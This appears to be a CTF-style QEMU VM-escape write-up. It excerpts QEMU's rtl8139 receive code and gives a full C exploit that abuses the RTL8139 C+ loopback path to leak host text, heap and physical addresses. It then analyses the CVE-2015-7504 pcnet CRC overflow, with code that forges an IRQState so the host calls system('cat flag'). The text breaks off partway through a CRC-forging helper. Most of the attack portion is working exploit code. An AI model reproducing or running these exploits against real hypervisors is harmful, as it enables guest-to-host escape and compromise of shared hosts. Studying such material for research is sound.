rxdw0 = le32_to_cpu(val);
pci_dma_read(d, cplus_rx_ring_desc+4, &val, 4);
rxdw1 = le32_to_cpu(val);
pci_dma_read(d, cplus_rx_ring_desc+8, &val, 4);
rxbufLO = le32_to_cpu(val);
pci_dma_read(d, cplus_rx_ring_desc+12, &val, 4);
rxbufHI = le32_to_cpu(val);

DPRINTF("+++ C+ mode RX descriptor %d %08x %08x %08x %08x\n",
descriptor, rxdw0, rxdw1, rxbufLO, rxbufHI);

if (!(rxdw0 & CP_RX_OWN))
{
DPRINTF("C+ Rx mode : descriptor %d is owned by host\n",
descriptor);

s->IntrStatus |= RxOverflow;
++s->RxMissed;

/* update tally counter */
++s->tally_counters.RxERR;
++s->tally_counters.MissPkt;

rtl8139_update_irq(s);
return size_;
}

uint32_t rx_space = rxdw0 & CP_RX_BUFFER_SIZE_MASK;

/* write VLAN info to descriptor variables. */
if (s->CpCmd & CPlusRxVLAN &&
lduw_be_p(&buf[ETH_ALEN * 2]) == ETH_P_VLAN) {
dot1q_buf = &buf[ETH_ALEN * 2];
size -= VLAN_HLEN;
/* if too small buffer, use the tailroom added duing expansion */
if (size < MIN_BUF_SIZE) {
size = MIN_BUF_SIZE;
}

rxdw1 &= ~CP_RX_VLAN_TAG_MASK;
/* BE + ~le_to_cpu()~ + cpu_to_le() = BE */
rxdw1 |= CP_RX_TAVA | lduw_le_p(&dot1q_buf[ETHER_TYPE_LEN]);

DPRINTF("C+ Rx mode : extracted vlan tag with tci: ""%u\n",
lduw_be_p(&dot1q_buf[ETHER_TYPE_LEN]));
} else {
/* reset VLAN tag flag */
rxdw1 &= ~CP_RX_TAVA;
}

/* TODO: scatter the packet over available receive ring descriptors space */

if (size+4 > rx_space)
{
DPRINTF("C+ Rx mode : descriptor %d size %d received %zu + 4\n",
descriptor, rx_space, size);

s->IntrStatus |= RxOverflow;
++s->RxMissed;

/* update tally counter */
++s->tally_counters.RxERR;
++s->tally_counters.MissPkt;

rtl8139_update_irq(s);
return size_;
}

dma_addr_t rx_addr = rtl8139_addr64(rxbufLO, rxbufHI);

/* receive/copy to target memory */
if (dot1q_buf) {
pci_dma_write(d, rx_addr, buf, 2 * ETH_ALEN);
pci_dma_write(d, rx_addr + 2 * ETH_ALEN,
buf + 2 * ETH_ALEN + VLAN_HLEN,
size - 2 * ETH_ALEN);
} else {
pci_dma_write(d, rx_addr, buf, size);
}

if (s->CpCmd & CPlusRxChkSum)
{
/* do some packet checksumming */
}

/* write checksum */
val = cpu_to_le32(crc32(0, buf, size_));
pci_dma_write(d, rx_addr+size, (uint8_t *)&val, 4);

/* first segment of received packet flag */
#define CP_RX_STATUS_FS (1<<29)
/* last segment of received packet flag */
#define CP_RX_STATUS_LS (1<<28)
/* multicast packet flag */
#define CP_RX_STATUS_MAR (1<<26)
/* physical-matching packet flag */
#define CP_RX_STATUS_PAM (1<<25)
/* broadcast packet flag */
#define CP_RX_STATUS_BAR (1<<24)
/* runt packet flag */
#define CP_RX_STATUS_RUNT (1<<19)
/* crc error flag */
#define CP_RX_STATUS_CRC (1<<18)
/* IP checksum error flag */
#define CP_RX_STATUS_IPF (1<<15)
/* UDP checksum error flag */
#define CP_RX_STATUS_UDPF (1<<14)
/* TCP checksum error flag */
#define CP_RX_STATUS_TCPF (1<<13)

/* transfer ownership to target */
rxdw0 &= ~CP_RX_OWN;

/* set first segment bit */
rxdw0 |= CP_RX_STATUS_FS;

/* set last segment bit */
rxdw0 |= CP_RX_STATUS_LS;

/* set received packet type flags */
if (packet_header & RxBroadcast)
rxdw0 |= CP_RX_STATUS_BAR;
if (packet_header & RxMulticast)
rxdw0 |= CP_RX_STATUS_MAR;
if (packet_header & RxPhysical)
rxdw0 |= CP_RX_STATUS_PAM;

/* set received size */
rxdw0 &= ~CP_RX_BUFFER_SIZE_MASK;
rxdw0 |= (size+4);

/* update ring data */
val = cpu_to_le32(rxdw0);
pci_dma_write(d, cplus_rx_ring_desc, (uint8_t *)&val, 4);
val = cpu_to_le32(rxdw1);
pci_dma_write(d, cplus_rx_ring_desc+4, (uint8_t *)&val, 4);

/* update tally counter */
++s->tally_counters.RxOk;

/* seek to next Rx descriptor */
if (rxdw0 & CP_RX_EOR)
{
s->currCPlusRxDesc = 0;
}
else
{
++s->currCPlusRxDesc;
}

DPRINTF("done C+ Rx mode ----------------\n");

}
else
{
DPRINTF("in ring Rx mode ================\n");

/* begin ring receiver mode */
int avail = MOD2(s->RxBufferSize + s->RxBufPtr - s->RxBufAddr, s->RxBufferSize);

/* if receiver buffer is empty then avail == 0 */

#define RX_ALIGN(x) (((x) + 3) & ~0x3)

if (avail != 0 && RX_ALIGN(size + 8) >= avail)
{
DPRINTF("rx overflow: rx buffer length %d head 0x%04x "
"read 0x%04x === available 0x%04x need 0x%04zx\n",
s->RxBufferSize, s->RxBufAddr, s->RxBufPtr, avail, size + 8);

s->IntrStatus |= RxOverflow;
++s->RxMissed;
rtl8139_update_irq(s);
return 0;
}

packet_header |= RxStatusOK;

packet_header |= (((size+4) << 16) & 0xffff0000);

/* write header */
uint32_t val = cpu_to_le32(packet_header);

rtl8139_write_buffer(s, (uint8_t *)&val, 4);

rtl8139_write_buffer(s, buf, size);

/* write checksum */
val = cpu_to_le32(crc32(0, buf, size));
rtl8139_write_buffer(s, (uint8_t *)&val, 4);

/* correct buffer write pointer */
s->RxBufAddr = MOD2(RX_ALIGN(s->RxBufAddr), s->RxBufferSize);

/* now we can signal we have received something */

DPRINTF("received: rx buffer length %d head 0x%04x read 0x%04x\n",
s->RxBufferSize, s->RxBufAddr, s->RxBufPtr);
}

s->IntrStatus |= RxOK;

if (do_interrupt)
{
rtl8139_update_irq(s);
}

return size_;
}
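Reading the C+ branch above, each Rx descriptor must be owned by the device (CP_RX_OWN), must advertise a buffer of at least size + 4 bytes, and the last one should carry CP_RX_EOR so that the ring wraps. A minimal sketch of such a ring setup follows; init_rx_ring and its parameters are hypothetical, the buffer addresses are assumed to be guest-physical and to fit in 32 bits, and writing the ring's own physical address to RxRingAddrLO/RxRingAddrHI is left out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define CP_RX_OWN (1u << 31)
#define CP_RX_EOR (1u << 30)
#define CP_RX_BUFFER_SIZE_MASK ((1u << 13) - 1)

struct cplus_desc {
    uint32_t dw0;
    uint32_t dw1;
    uint32_t bufLO;
    uint32_t bufHI;
};

/* Fill n Rx descriptors: each is handed to the device and points at one
 * receive buffer of buf_size bytes; the last one closes the ring. */
static void init_rx_ring(struct cplus_desc *ring, size_t n,
                         const uint32_t *buf_phys, uint32_t buf_size)
{
    assert(n > 0 && buf_size <= CP_RX_BUFFER_SIZE_MASK);
    for (size_t i = 0; i < n; i++) {
        ring[i].dw0 = CP_RX_OWN | buf_size; /* device-owned, size in bits 0..12 */
        ring[i].dw1 = 0;
        ring[i].bufLO = buf_phys[i];
        ring[i].bufHI = 0;
    }
    ring[n - 1].dw0 |= CP_RX_EOR; /* wrap back to descriptor 0 */
}
```

After a frame is received, the device clears CP_RX_OWN and stores size + 4 in the low bits of dw0, so the guest can detect completed descriptors by polling that bit.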

The final exploit is as follows:

#include <sys/io.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

int fd;

#define RTL8139 0xc000

#define ETH_HLEN 14
#define ETH_MTU 1500

#define MAX 44

#define PAGE_SIZE 0x1000
/* w0 ownership flag */
#define CP_TX_OWN (1<<31)
/* w0 end of ring flag */
#define CP_TX_EOR (1<<30)
/* first segment of received packet flag */
#define CP_TX_FS (1<<29)
/* last segment of received packet flag */
#define CP_TX_LS (1<<28)
/* large send packet flag */
#define CP_TX_LGSEN (1<<27)
/* large send MSS mask, bits 16...25 */
#define CP_TC_LGSEN_MSS_MASK ((1 << 12) - 1)

/* IP checksum offload flag */
#define CP_TX_IPCS (1<<18)
/* UDP checksum offload flag */
#define CP_TX_UDPCS (1<<17)
/* TCP checksum offload flag */
#define CP_TX_TCPCS (1<<16)

/* w0 bits 0...15 : buffer size */
#define CP_TX_BUFFER_SIZE (1<<16)
#define CP_TX_BUFFER_SIZE_MASK (CP_TX_BUFFER_SIZE - 1)
/* w1 add tag flag */
#define CP_TX_TAGC (1<<17)
/* w1 bits 0...15 : VLAN tag (big endian) */
#define CP_TX_VLAN_TAG_MASK ((1<<16) - 1)
/* w2 low 32bit of Rx buffer ptr */
/* w3 high 32bit of Rx buffer ptr */

/* set after transmission */
/* FIFO underrun flag */
#define CP_TX_STATUS_UNF (1<<25)
/* transmit error summary flag, valid if set any of three below */
#define CP_TX_STATUS_TES (1<<23)
/* out-of-window collision flag */
#define CP_TX_STATUS_OWC (1<<22)
/* link failure flag */
#define CP_TX_STATUS_LNKF (1<<21)
/* excessive collisions flag */
#define CP_TX_STATUS_EXC (1<<20)

#define CP_RX_EOR (1<<30)
#define CP_RX_OWN (1<<31)

#define CP_RX_BUFFER_SIZE_MASK ((1<<13) - 1)
#define USHRT_MAX 65535
enum RTL_8139_tx_config_bits {
TxLoopBack = (1 << 18) | (1 << 17), /* enable loopback test mode */
/*...*/
};

enum RTL_8139_rx_mode_bits {
AcceptErr = 0x20,
AcceptRunt = 0x10,
AcceptBroadcast = 0x08,
AcceptMulticast = 0x04,
AcceptMyPhys = 0x02,
AcceptAllPhys = 0x01,
Wrap = 0x80,
MxDMA256 = 0x400,
RbLen64 = 0x1800,
RxFTh512 = 0xa000,
};
enum RTL8139_registers {
MAC0 = 0, /* Ethernet hardware address. */
MAR0 = 8, /* Multicast filter. */
TxStatus0 = 0x10,/* Transmit status (Four 32bit registers). C mode only */
/* Dump Tally Conter control register(64bit). C+ mode only */
TxAddr0 = 0x20, /* Tx descriptors (also four 32bit). */
RxBuf = 0x30,
ChipCmd = 0x37,
RxBufPtr = 0x38,
RxBufAddr = 0x3A,
IntrMask = 0x3C,
IntrStatus = 0x3E,
TxConfig = 0x40,
RxConfig = 0x44,
Timer = 0x48, /* A general-purpose counter. */
RxMissed = 0x4C, /* 24 bits valid, write clears. */
Cfg9346 = 0x50,
Config0 = 0x51,
Config1 = 0x52,
FlashReg = 0x54,
MediaStatus = 0x58,
Config3 = 0x59,
Config4 = 0x5A, /* absent on RTL-8139A */
HltClk = 0x5B,
MultiIntr = 0x5C,
PCIRevisionID = 0x5E,
TxSummary = 0x60, /* TSAD register. Transmit Status of All Descriptors*/
BasicModeCtrl = 0x62,
BasicModeStatus = 0x64,
NWayAdvert = 0x66,
NWayLPAR = 0x68,
NWayExpansion = 0x6A,
/* Undocumented registers, but required for proper operation. */
FIFOTMS = 0x70, /* FIFO Control and test. */
CSCR = 0x74, /* Chip Status and Configuration Register. */
PARA78 = 0x78,
PARA7c = 0x7c, /* Magic transceiver parameter register. */
Config5 = 0xD8, /* absent on RTL-8139A */
/* C+ mode */
TxPoll = 0xD9, /* Tell chip to check Tx descriptors for work */
RxMaxSize = 0xDA, /* Max size of an Rx packet (8169 only) */
CpCmd = 0xE0, /* C+ Command register (C+ mode only) */
IntrMitigate = 0xE2, /* rx/tx interrupt mitigation control */
RxRingAddrLO = 0xE4, /* 64-bit start addr of Rx ring */
RxRingAddrHI = 0xE8, /* 64-bit start addr of Rx ring */
TxThresh = 0xEC, /* Early Tx threshold */
};

enum ChipCmdBits {
CmdReset = 0x10,
CmdRxEnb = 0x08,
CmdTxEnb = 0x04,
RxBufEmpty = 0x01,
};

/* C+ mode */
enum CplusCmdBits {
CPlusRxVLAN = 0x0040, /* enable receive VLAN detagging */
CPlusRxChkSum = 0x0020, /* enable receive checksum offloading */
CPlusRxEnb = 0x0002,
CPlusTxEnb = 0x0001,
};

struct cplus_desc
{
    uint32_t dw0;
    uint32_t dw1;
    uint32_t bufLO;
    uint32_t bufHI;
};
struct ring
{
    struct cplus_desc * desc;
    void * buf;
};
static uint8_t rtl8139_packet [] = {
0x52, 0x54, 0x00, 0x12, 0x34, 0x56, 0x52, 0x54, 0x00, 0x12, 0x34,
0x56, 0x08, 0x00, 0x45, 0x00, 0x00, 0x13, 0xde, 0xad, 0x40, 0x00,
0x40, 0x06, 0xde, 0xad, 0xc0, 0x08, 0x01, 0x01, 0xc0, 0xa8, 0x01,
0x02, 0xde, 0xad, 0xbe, 0xef, 0xca, 0xfe, 0xba, 0xbe, 0xca, 0xfe,
0xba, 0xbe, 0x50, 0x10, 0xde, 0xad, 0xde, 0xad, 0x66, 0x6c ,0x61,
0x67
};

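/* Translate a guest virtual address to a guest physical address via pagemap. */
uint32_t v2p(void * addr)
{
    /* keep the page index in 64 bits: addr / PAGE_SIZE can exceed 32 bits */
    uint64_t index = (uint64_t)addr / PAGE_SIZE;
    uint64_t num = 0;
    lseek(fd,index * 8,SEEK_SET);
    read(fd,&num,8);
    /* bits 0..54 of a pagemap entry hold the page frame number */
    return ((num & (((uint64_t)1 << 55) - 1)) << 12) + (uint64_t)addr % PAGE_SIZE;
}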

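void cfgtx(struct cplus_desc * addr,char * buf)
{
    /* owned by the NIC, end of ring, last segment, IP checksum offload, large send */
    addr->dw0 |= CP_TX_OWN|CP_TX_EOR|CP_TX_LS|CP_TX_IPCS|CP_TX_LGSEN;
    /* low bits of dw0 carry the buffer size */
    addr->dw0 += ETH_MTU + ETH_HLEN;
    addr->bufLO = v2p(buf);
    /* program the physical address of the Tx descriptor */
    uint32_t paddr = v2p(addr);
    outl(paddr,RTL8139 + TxAddr0);
    outl(0,RTL8139 + TxAddr0 + 4);
}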
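void cfgrx(void ** rx_ptr,struct cplus_desc * buf)
{
    int i;
    uint32_t addr;
    for(i = 0;i < MAX; i++)
    {
        void * p = malloc(1514);
        /* touch the buffer so its page is resident before v2p() reads pagemap,
           and so stale heap data is not mistaken for a leak */
        memset(p,0,1514);
        rx_ptr[i] = p;
        addr = (uint32_t)v2p(p);

        /* hand the descriptor to the NIC; the last one closes the ring */
        buf[i].dw0 |= CP_RX_OWN;
        if (i == MAX - 1)
            buf[i].dw0 |= CP_RX_EOR;
        buf[i].dw0 &= ~CP_RX_BUFFER_SIZE_MASK;
        buf[i].dw0 |= USHRT_MAX;
        buf[i].bufLO = addr;
    }
    /* program the physical address of the Rx ring */
    uint32_t paddr = v2p(buf);
    outl(paddr,RTL8139 + RxRingAddrLO);
    outl(0,RTL8139 + RxRingAddrHI);
}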

void send(void * buf,void * data,int len)
{
    memcpy(buf, data, len);
    outb((1 << 6), RTL8139+ TxPoll);
}

// void xxd(void *ptr, size_t size)
// {
// size_t i;
// for (i = 0; i < size; i++) {
// if (i % 16 == 0) printf("\n0x%016x: ", ptr+i);
// printf("%02x", *(uint8_t *)(ptr+i));
// if (i % 16 != 0 && i % 2 == 1) printf(" ");
// }
// printf("\n");
// }
uint64_t findText(void * ptr,size_t size)
{
    uint64_t text_offset[6] = {0xf0650,0x36d0dd,0x36d1fc,0xf01a0,0x8ee100,0x161a850};
    uint64_t TEXT = 0;
    size_t i,j;
    char flag = 0;
    /* stop early enough that each 64-bit read stays inside the buffer */
    for(i = 0;i + 8 <= size; i+=8)
    {
        uint64_t value = *(uint64_t *)((uint8_t *)ptr + i);
        /* candidate pointer: non-zero, top byte clear, of the form 0x5xxxxxxxxxxx */
        if((value!= 0) && ((value & 0xff00000000000000) == 0))
        {
            if((value >> 44) == 5)
            {
                for(j = 0;j < 6;j++)
                {
                    /* a known offset fits if subtracting it gives a page-aligned base */
                    if(((value - text_offset[j]) & 0xfff) == 0)
                    {
                        flag = 1;
                        TEXT = value - text_offset[j];
                    }
                }
            }
        }
        if(flag)
        {
            printf("TEXT: 0x%llx\n",(unsigned long long)TEXT);
            return TEXT;
        }
    }
    return 0;
}

uint64_t findHeap(void * ptr,size_t size)
{
    uint64_t heap_offset[9] = {0x574b0,0x1130a0,0xecd3d0,0xc2ac0,0x46850,0xc6ac8,0x13a508,0x13a600,0xd50258};
    uint64_t HEAP = 0;
    size_t i,j;
    char flag = 0;
    /* stop early enough that each 64-bit read stays inside the buffer */
    for(i = 0;i + 8 <= size; i+=8)
    {
        uint64_t value = *(uint64_t *)((uint8_t *)ptr + i);
        /* candidate pointer: non-zero, top byte clear, of the form 0x5xxxxxxxxxxx */
        if((value!= 0) && ((value & 0xff00000000000000) == 0))
        {
            if((value >> 44) == 5)
            {
                for(j = 0;j < 9;j++)
                {
                    /* a known offset fits if subtracting it gives a page-aligned base */
                    if(((value - heap_offset[j]) & 0xfff) == 0)
                    {
                        flag = 1;
                        HEAP = value - heap_offset[j];
                    }
                }
            }
        }
        if(flag)
        {
            printf("HEAP: 0x%llx\n",(unsigned long long)HEAP);
            return HEAP;
        }
    }
    return 0;
}


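uint64_t findPhy(void * ptr,size_t size)
{
    uint64_t PHY = 0;
    size_t i;
    char flag = 0;
    /* stop early enough that each 64-bit read stays inside the buffer */
    for(i = 0;i + 8 <= size; i+=8)
    {
        uint64_t value = *(uint64_t *)((uint8_t *)ptr + i);
        if((value!= 0) && ((value & 0xff00000000000000) == 0))
        {
            /* pointer in the 0x7f... mmap range */
            if((value & 0xff0000000000) == 0x7f0000000000)
            {
                /* round down to 16 MiB, then step back 0x80000000
                   (2 GiB, the same size as the -m 2048 guest RAM) */
                value &= 0xffffffffff000000;
                value -= 0x80000000;
                PHY = value;
                flag = 1;
            }
        }
        if(flag)
        {
            printf("PHY: 0x%llx\n",(unsigned long long)PHY);
            return PHY;
        }
    }
    return 0;
}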


int main()
{
    uint64_t PHY = 0,HEAP = 0,TEXT = 0;
    int i;

    fd = open("/proc/self/pagemap",O_RDONLY);
    if (fd < 0) { perror("open /proc/self/pagemap"); return 1; }
    /* port I/O from user space needs I/O privilege level 3 */
    if (iopl(3) < 0) { perror("iopl"); return 1; }

    /* enable Tx/Rx in legacy and C+ mode, loop packets back, accept our own MAC */
    outb(CmdTxEnb|CmdRxEnb,RTL8139 + ChipCmd);
    outw(CPlusTxEnb|CPlusRxEnb,RTL8139 + CpCmd);
    outl(TxLoopBack, RTL8139 + TxConfig);
    outl(AcceptMyPhys, RTL8139 + RxConfig);

    /* one Tx descriptor and its packet buffer */
    struct cplus_desc * tx_addr = malloc(sizeof(struct cplus_desc));
    memset(tx_addr,0,sizeof(struct cplus_desc));
    void * tx_buf = malloc(ETH_HLEN + ETH_MTU);
    memset(tx_buf,0,ETH_HLEN + ETH_MTU);

    /* MAX Rx descriptors plus a table of their buffers */
    void ** rx_ptr = malloc(sizeof(void *) * MAX);
    void * rx_buf = malloc(sizeof(struct cplus_desc) * MAX);
    memset(rx_buf,0,sizeof(struct cplus_desc) * MAX);

    cfgtx(tx_addr,tx_buf);
    cfgrx(rx_ptr,rx_buf);

    /* send the crafted packet, then give the device time to loop it back */
    send(tx_buf, rtl8139_packet,sizeof(rtl8139_packet));
    sleep(1);

    /* scan every received buffer for leaked pointers */
    for (i = 0; i < MAX; i++)
    {
        PHY = findPhy(rx_ptr[i], 1514);
        if(PHY) break;
    }
    for (i = 0; i < MAX; i++)
    {
        TEXT = findText(rx_ptr[i], 1514);
        if(TEXT) break;
    }
    for (i = 0; i < MAX; i++)
    {
        HEAP = findHeap(rx_ptr[i], 1514);
        if(HEAP) break;
    }
    return 0;
}
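
The `v2p` helper in the listing above depends on the layout of `/proc/self/pagemap`: one 64-bit entry per virtual page, with the page frame number in bits 0-54 and a "present" flag in bit 63. Below is a minimal sketch of that decoding as pure functions. The names `pagemap_offset` and `pagemap_to_phys` and the `PM_*` macros are illustrative assumptions, not part of the original exploit.

```c
#include <stdint.h>

#define PM_PAGE_SHIFT 12                         /* 4 KiB pages, like PAGE_SIZE 0x1000 */
#define PM_PFN_MASK   ((UINT64_C(1) << 55) - 1)  /* bits 0..54: page frame number */
#define PM_PRESENT    (UINT64_C(1) << 63)        /* bit 63: page is present in RAM */

/* Byte offset inside pagemap of the entry that describes vaddr. */
uint64_t pagemap_offset(uint64_t vaddr)
{
    return (vaddr >> PM_PAGE_SHIFT) * sizeof(uint64_t);
}

/* Turn a raw pagemap entry into a physical address; 0 means "not resolvable". */
uint64_t pagemap_to_phys(uint64_t entry, uint64_t vaddr)
{
    uint64_t pfn = entry & PM_PFN_MASK;

    if (!(entry & PM_PRESENT) || pfn == 0)
        return 0;
    return (pfn << PM_PAGE_SHIFT) | (vaddr & ((UINT64_C(1) << PM_PAGE_SHIFT) - 1));
}
```

The page index is computed in 64 bits because `vaddr >> 12` can exceed 32 bits for high user-space addresses. On Linux 4.2 and later the PFN field reads as zero without `CAP_SYS_ADMIN`, so this lookup only works for a privileged process in the guest.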

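
`findText` and `findHeap` share one idea: a leaked pointer minus a known offset must land on a page boundary if it really points at that symbol or chunk. Here is a small sketch of that check. The helper names `match_base` and `looks_like_pie_pointer` are hypothetical, and unlike the exploit this version returns the first offset that fits rather than the last.

```c
#include <stddef.h>
#include <stdint.h>

/* Return the candidate base for a leaked value, or 0 if no offset fits.
 * An offset fits when (value - offset) is 4 KiB aligned, the same test
 * the exploit applies with ((value - off) & 0xfff) == 0. */
uint64_t match_base(uint64_t value, const uint64_t *offsets, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (value >= offsets[i] && ((value - offsets[i]) & 0xfff) == 0)
            return value - offsets[i];
    }
    return 0;
}

/* Plausibility filter applied before matching: non-zero, top byte clear,
 * and an address of the form 0x5xxxxxxxxxxx (value >> 44 == 5). */
int looks_like_pie_pointer(uint64_t value)
{
    return value != 0 &&
           (value & UINT64_C(0xff00000000000000)) == 0 &&
           (value >> 44) == 5;
}
```

Only the low 12 bits are compared, so any pointer that happens to share a page offset with one of the known offsets also matches. The offset tables are therefore tied to one specific QEMU build and have to be re-measured for another.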
CVE-2015-7504

CVE-2015-7504 is in the pcnet_receive() function of hw/net/pcnet.c. The bug sits in the CRC computation for the packet:

if (!s->looptest) {
    memcpy(src, buf, size);
    /* no need to compute the CRC */
    src[size] = 0;
    src[size + 1] = 0;
    src[size + 2] = 0;
    src[size + 3] = 0;
    size += 4;
} else if (s->looptest == PCNET_LOOPTEST_CRC ||
           !CSR_DXMTFCS(s) || size < MIN_BUF_SIZE+4) {
    uint32_t fcs = ~0;
    uint8_t *p = src;

    while (p != &src[size])
        CRC(fcs, *p++);
    *(uint32_t *)p = htonl(fcs);
    size += 4;
} else {
    uint32_t fcs = ~0;
    uint8_t *p = src;

    while (p != &src[size-4])
        CRC(fcs, *p++);
    crc_err = (*(uint32_t *)p != htonl(fcs));
}

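When computing the CRC, the code appends the 4-byte result right after the packet data without checking size. The buffer itself is a field of the following struct: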

struct PCNetState_st {
    NICState *nic;
    NICConf conf;
    QEMUTimer *poll_timer;
    int rap, isr, lnkst;
    uint32_t rdra, tdra;
    uint8_t prom[16];
    uint16_t csr[128];
    uint16_t bcr[32];
    int xmit_pos;
    uint64_t timer;
    MemoryRegion mmio;
    uint8_t buffer[4096];
    qemu_irq irq;
    void (*phys_mem_read)(void *dma_opaque, hwaddr addr,
                          uint8_t *buf, int len, int do_bswap);
    void (*phys_mem_write)(void *dma_opaque, hwaddr addr,
                           uint8_t *buf, int len, int do_bswap);
    void *dma_opaque;
    int tx_busy;
    int looptest;
};

The buffer is 4096 bytes long, and the caller of pcnet_receive (the transmit path) limits size to at most 4096:

if (s->xmit_pos + bcnt > sizeof(s->buffer)) {
    s->xmit_pos = -1;
    goto txdone;
}

s->phys_mem_read(s->dma_opaque, PHYSADDR(s, tmd.tbadr),
                 s->buffer + s->xmit_pos, bcnt, CSR_BSWP(s));
s->xmit_pos += bcnt;

if (!GET_FIELD(tmd.status, TMDS, ENP)) {
    goto txdone;
}

#ifdef PCNET_DEBUG
printf("pcnet_transmit size=%d\n", s->xmit_pos);
#endif
if (CSR_LOOP(s)) {
    if (BCR_SWSTYLE(s) == 1)
        add_crc = !GET_FIELD(tmd.status, TMDS, NOFCS);
    s->looptest = add_crc ? PCNET_LOOPTEST_CRC : PCNET_LOOPTEST_NOCRC;
    pcnet_receive(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);

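The check only rejects s->xmit_pos + bcnt > 4096, and it is followed by s->xmit_pos += bcnt, so size can reach exactly 4096. When size is 4096, the 4-byte CRC is written just past the end of buffer, which overflows exactly four bytes. The field that follows buffer in the struct is a pointer, qemu_irq irq, which is defined as follows: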

typedef struct IRQState *qemu_irq;

struct IRQState {
    Object parent_obj;

    qemu_irq_handler handler;
    void *opaque;
    int n;
};

void qemu_set_irq(qemu_irq irq, int level)
{
    if (!irq)
        return;

    irq->handler(irq->opaque, irq->n, level);
}

The pointer refers to an IRQState struct, and qemu_set_irq makes an indirect call through it: irq->handler(). The function pcnet_update_irq(PCNetState *s) calls qemu_set_irq. So if we redirect this pointer to a struct we have forged, we control rip.
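
To make the dispatch concrete, here is a simplified model of the hijack, not QEMU code. `model_irq` and `model_nic` are hypothetical stand-ins for IRQState and PCNetState (without `parent_obj` and the other fields), `model_system` records its argument instead of running a command, and the pointer is replaced as a whole, whereas the real bug only rewrites its low 4 bytes.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef void (*irq_handler)(void *opaque, int n, int level);

struct model_irq {
    irq_handler handler;
    void *opaque;
    int n;
};

struct model_nic {
    union {
        uint8_t bytes[4096];      /* attacker-controlled packet data */
        struct model_irq slots[4096 / sizeof(struct model_irq)];
    } buffer;
    struct model_irq *irq;        /* sits directly after the buffer */
};

_Static_assert(offsetof(struct model_nic, irq) == 4096,
               "irq is the first field past the 4096-byte buffer");

/* Same shape as qemu_set_irq(): an indirect call through the irq object. */
void model_set_irq(struct model_irq *irq, int level)
{
    if (!irq)
        return;
    irq->handler(irq->opaque, irq->n, level);
}

/* Stand-in for system(): remembers the command instead of executing it. */
char model_last_cmd[64];
void model_system(void *opaque, int n, int level)
{
    (void)n;
    (void)level;
    strncpy(model_last_cmd, (const char *)opaque, sizeof(model_last_cmd) - 1);
    model_last_cmd[sizeof(model_last_cmd) - 1] = '\0';
}

/* Forge an irq object plus its argument inside the buffer and redirect irq. */
void model_hijack(struct model_nic *nic, const char *cmd)
{
    char *cmd_in_buf = (char *)&nic->buffer.bytes[0x1f * 8];
    size_t len = strlen(cmd);
    struct model_irq *fake = &nic->buffer.slots[5];

    if (len > 31)
        len = 31;
    memcpy(cmd_in_buf, cmd, len);
    cmd_in_buf[len] = '\0';

    fake->handler = model_system;   /* the exploit uses system@plt here */
    fake->opaque = cmd_in_buf;      /* becomes the first argument */
    fake->n = 0;
    nic->irq = fake;
}
```

Calling `model_hijack(&nic, "cat flag")` and then `model_set_irq(nic.irq, 1)` ends up in `model_system` with the command string as its first argument, which mirrors how `handler(opaque, n, level)` turns into a `system()` call with a chosen string.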

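Set a breakpoint with b hw/net/pcnet.c:1005 and print s: the PCNetState struct lives on the heap. Since we can only overwrite the low 4 bytes of the irq pointer, the forged struct has to live in heap memory as well, and the heap memory we control is obviously s.buffer[4096].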

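But the most we can leak is the heap base, so how do we find the address of s? QEMU performs the same sequence of heap allocations and frees every time it starts, so the offset of s from the heap base is fixed. Debugging shows that on my machine the struct is at offset 0x67e1b0.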
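
The address arithmetic behind this can be sketched as follows. The constant 0x67e1b0 comes from the text, while 0x2290 and 0x10 * 8 are taken from the exploit code in this post. Reading 0x2290 as the offset of buffer inside PCNetState is an assumption, and the function names are illustrative.

```c
#include <stdint.h>

/* Build-specific offsets; they must be re-measured on any other QEMU build. */
#define PCNET_STATE_OFF UINT64_C(0x67e1b0) /* PCNetState relative to the heap base */
#define BUFFER_OFF      UINT64_C(0x2290)   /* assumed: buffer[] inside PCNetState */
#define FAKE_IRQ_OFF    UINT64_C(0x80)     /* 0x10 * 8: forged irq inside the packet */

/* Absolute address of the forged irq object for a leaked heap base. */
uint64_t fake_irq_address(uint64_t heap_base)
{
    return heap_base + PCNET_STATE_OFF + BUFFER_OFF + FAKE_IRQ_OFF;
}

/* Effect of the 4-byte overflow on a little-endian host:
 * only the low half of the 64-bit pointer changes. */
uint64_t overwrite_low32(uint64_t old_ptr, uint32_t low32)
{
    return (old_ptr & UINT64_C(0xffffffff00000000)) | low32;
}

/* The redirect only works if the old pointer and the forged object
 * share their upper 32 bits, i.e. both live in the same heap region. */
int redirect_reaches(uint64_t old_irq, uint64_t heap_base)
{
    uint64_t want = fake_irq_address(heap_base);
    return overwrite_low32(old_irq, (uint32_t)want) == want;
}
```

This is why a forged object on the stack or in an mmap region would not do: its upper 32 bits would differ from those of the original heap pointer.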

Forging the data on the heap:

scanf("%llx",&heapBaseAddr);
scanf("%llx",&textBaseAddr);
uint64_t *packet_ptr;
packet_ptr = (uint64_t *)pcnet_packet;
/* forged irq object, placed 0x10 * 8 bytes into the packet */
struct fake_irq * irq_ptr = (struct fake_irq *)(packet_ptr + 0x10);

irq_ptr->handler = system_plt + textBaseAddr;
/* opaque is passed as the first argument: the address of the string below */
irq_ptr->op = heapBaseAddr + 0x67e1b0 + 0x2290 + 0x1f*0x8;
/* "cat flag" as a little-endian 64-bit value (0x67616c6620746163) */
*(packet_ptr + 0x1f) = 7449354444534473059;
*(packet_ptr + 0x20) = 0;
*(packet_ptr + 0x21) = 0;

iopl(3);

...

/* compute required crc */
ptr = pcnet_packet;
while (ptr != &pcnet_packet[PCNET_BUFFER_SIZE - 4])
    CRC(fcs, *ptr++);

/* low 32 bits of the forged irq object's address */
targetValue = (heapBaseAddr + 0x67e1b0 + 0x2290 + 0x10*8) & 0xffffffff;
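
The snippet computes the CRC over the first 4092 bytes and a target value, so the remaining step is to pick the last four packet bytes such that the CRC register ends at a chosen value. One way to do that is standard CRC-32 forging, sketched below. It assumes QEMU's `CRC` macro is the usual table-driven reflected CRC-32 (polynomial 0xEDB88320); `crc_bytes` and `crc_forge` are illustrative names, not functions from the exploit or from QEMU.

```c
#include <stddef.h>
#include <stdint.h>

static uint32_t crc_tab[256];
static uint8_t  crc_rev[256];   /* top byte of a table entry -> its index */
static int      crc_ready;

static void crc_init(void)
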